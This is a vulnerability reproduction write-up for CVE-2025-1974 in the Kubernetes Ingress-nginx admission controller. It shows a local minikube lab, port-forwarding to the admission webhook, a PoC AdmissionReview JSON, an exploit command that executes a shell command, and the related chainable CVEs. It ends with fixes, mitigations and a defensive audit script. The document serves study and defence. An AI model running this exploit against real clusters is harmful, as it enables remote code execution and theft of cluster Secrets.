# Kubernetes Ingress-nginx admission remote code execution vulnerability CVE-2025-1974

## Vulnerability description

Ingress-nginx is the access entry point that exposes services inside a Kubernetes cluster to the outside and carries traffic to those services. In versions earlier than 1.12.1, the Kubernetes Ingress-nginx admission controller has a configuration injection vulnerability: a remote attacker who has already gained access to the cluster network can submit a configuration for validation through the `ValidatingAdmissionWebhook` and insert malicious configuration into it, achieving remote code execution. This gives the attacker control of the container running Ingress-nginx and may lead to leakage of the cluster's Secrets.

References:

- https://github.com/kubernetes/kubernetes/issues/131009
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1974
- https://github.com/sandumjacob/IngressNightmare-POCs
- CVE-2025-24513: [kubernetes/kubernetes#131005](https://github.com/kubernetes/kubernetes/issues/131005)
- CVE-2025-24514: [kubernetes/kubernetes#131006](https://github.com/kubernetes/kubernetes/issues/131006)
- CVE-2025-1097: [kubernetes/kubernetes#131007](https://github.com/kubernetes/kubernetes/issues/131007)
- CVE-2025-1098: [kubernetes/kubernetes#131008](https://github.com/kubernetes/kubernetes/issues/131008)
- CVE-2025-1974: [kubernetes/kubernetes#131009](https://github.com/kubernetes/kubernetes/issues/131009)
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

## Affected versions

```
Ingress-nginx < v1.11.0
Ingress-nginx v1.11.0 - 1.11.4
Ingress-nginx v1.12.0
```

## Environment setup

Install minikube and kubectl:

- [minikube](https://minikube.sigs.k8s.io/docs/start/)
- [kubectl](https://kubernetes.io/docs/reference/kubectl/)

Start minikube. The minikube, kubectl and Kubernetes server versions used in this environment are:

```
minikube version
-----
minikube version: v1.33.1
commit: 5883c09216182566a63dff4c326a6fc9ed2982ff
```

```
kubectl version
-----
Client Version: v1.30.1
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.30.0
```

Download the [deploy.yaml](https://github.com/kubernetes/ingress-nginx/blob/f6456ea86c6c330e7cf401ade70ce1faa757265b/deploy/static/provider/cloud/deploy.yaml) for Kubernetes Ingress-nginx 1.11.3 and deploy the resources with kubectl:

```
kubectl apply -f deploy.yaml
```

Once the deployment has finished, list the pods in the ingress-nginx namespace with:

```
kubectl get pods -n ingress-nginx
-----
NAME                                        READY   STATUS      RESTARTS   AGE
ingress-nginx-admission-create-jmw9x        0/1     Completed   0          24m
ingress-nginx-admission-patch-jbxj6         0/1     Completed   1          24m
ingress-nginx-controller-869748796c-p4jvj   1/1     Running     0          24m
```

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172307109.png)

## Reproduction

Inspect the webhook server; the output shows it listening on port 8443:

```
kubectl describe pod ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
-----
--validating-webhook=:8443
```

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172648584.png)

Use port forwarding to reach the webhook port:

```
kubectl port-forward -n ingress-nginx ingress-nginx-controller-869748796c-p4jvj 1337:8443
```

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172813574.png)

The vulnerable webhook server is now forwarded from the pod to local port 1337. Run the [poc](https://github.com/sandumjacob/IngressNightmare-POCs), which sends an AdmissionRequest containing nginx configuration:

```
curl --insecure -v -H "Content-Type: application/json" --data @poc.json https://localhost:1337/fake/path
```

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173013506.png)

Check the controller logs to confirm that it executed:

```
kubectl logs ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
```

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173205563.png)

CVE-2025-1974 can be chained with other vulnerabilities:

- CVE-2025-1974 + CVE-2025-24514 → auth-url injection → RCE
- CVE-2025-1974 + CVE-2025-1097 → auth-tls-match-cn injection → RCE
- CVE-2025-1974 + CVE-2025-1098 → mirror UID injection → RCE

For local testing, forward the ports to `localhost`:

```
kubectl port-forward svc/ingress-nginx-controller -n ingress-nginx 8080:80
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```

Run the command `touch /tmp/awesome_poc`:

```
./exp -m c -c 'touch /tmp/awesome_poc' -i https://localhost:8443/networking/v1/ingresses -u http://localhost:8080/fake/addr
```

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173754627.png)

![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173824804.png)

## PoC

poc.json

```json
{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "kind": { "group": "networking.k8s.io", "version": "v1", "kind": "Ingress" },
    "resource": { "group": "", "version": "v1", "resource": "namespaces" },
    "operation": "CREATE",
    "object": {
      "metadata": {
        "name": "deads",
        "annotations": { "nginx.ingress.kubernetes.io/mirror-host": "test" }
      },
      "spec": {
        "rules": [
          {
            "host": "jacobsandum.com",
            "http": {
              "paths": [
                {
                  "path": "/",
                  "pathType": "Prefix",
                  "backend": { "service": { "name": "kubernetes", "port": { "number": 80 } } }
                }
              ]
            }
          }
        ],
        "ingressClassName": "nginx"
      }
    }
  }
}
```

## Fix

- Upgrade to 1.11.5 or 1.12.1 or a later release.
- Make sure the admission webhook endpoint is not exposed externally.

Mitigations:

- Reinstall ingress-nginx with the `controller.admissionWebhooks.enabled=false` parameter;
- Delete the `ValidatingWebhookConfiguration` named `ingress-nginx-admission`, and remove the `--validating-webhook` argument from the `ingress-nginx-controller` container's Deployment or DaemonSet.
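As an added defensive check (not part of this write-up or of the ingress-nginx project), the following Python applies the affected-version ranges and the second mitigation above to a controller Deployment in the shape returned by `kubectl get deploy -o json`. The functions `audit_controller` and `mitigated_copy`, the constructed `SAMPLE_DEPLOYMENT`, and the assumption that the container is named `controller` (as in the upstream deploy.yaml) are mine.

```python
import re
from copy import deepcopy


def parse_version(tag):
    """'v1.11.3' or 'v1.11.3@sha256:...' -> (1, 11, 3); None for non-release tags."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", tag)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(version):
    """Affected ranges listed on this page: every release below 1.11.5, plus 1.12.0."""
    return version < (1, 11, 5) or version == (1, 12, 0)


def _is_webhook_flag(arg):
    # The mitigation removes exactly this flag; other --validating-webhook-* flags are left alone.
    return arg == "--validating-webhook" or arg.startswith("--validating-webhook=")


def audit_controller(deployment):
    """Report an affected image tag and an enabled admission webhook for the controller container."""
    result = {"version": None, "vulnerable_version": False, "webhook_enabled": False}
    for c in deployment["spec"]["template"]["spec"]["containers"]:
        if c.get("name") != "controller":       # assumption: upstream container name
            continue
        tag = c["image"].split("@", 1)[0].rsplit(":", 1)[-1]   # drop digest, keep the tag
        result["version"] = parse_version(tag)
        if result["version"] is not None:
            result["vulnerable_version"] = is_vulnerable(result["version"])
        result["webhook_enabled"] = any(_is_webhook_flag(a) for a in c.get("args", []))
    return result


def mitigated_copy(deployment):
    """Return a copy with the --validating-webhook flag removed from every container."""
    d = deepcopy(deployment)
    for c in d["spec"]["template"]["spec"]["containers"]:
        c["args"] = [a for a in c.get("args", []) if not _is_webhook_flag(a)]
    return d


# Constructed sample, trimmed to the fields the audit reads (not a real cluster dump).
SAMPLE_DEPLOYMENT = {
    "metadata": {"name": "ingress-nginx-controller", "namespace": "ingress-nginx"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "controller",
        "image": "registry.k8s.io/ingress-nginx/controller:v1.11.3",
        "args": ["/nginx-ingress-controller", "--validating-webhook=:8443"],
    }]}}},
}

if __name__ == "__main__":
    print(audit_controller(SAMPLE_DEPLOYMENT))
    print(audit_controller(mitigated_copy(SAMPLE_DEPLOYMENT)))
```

On a live cluster, pipe `kubectl get deploy ingress-nginx-controller -n ingress-nginx -o json` through `json.load` and pass the result to `audit_controller`; the version finding is only cleared by upgrading, the webhook finding by the mitigation.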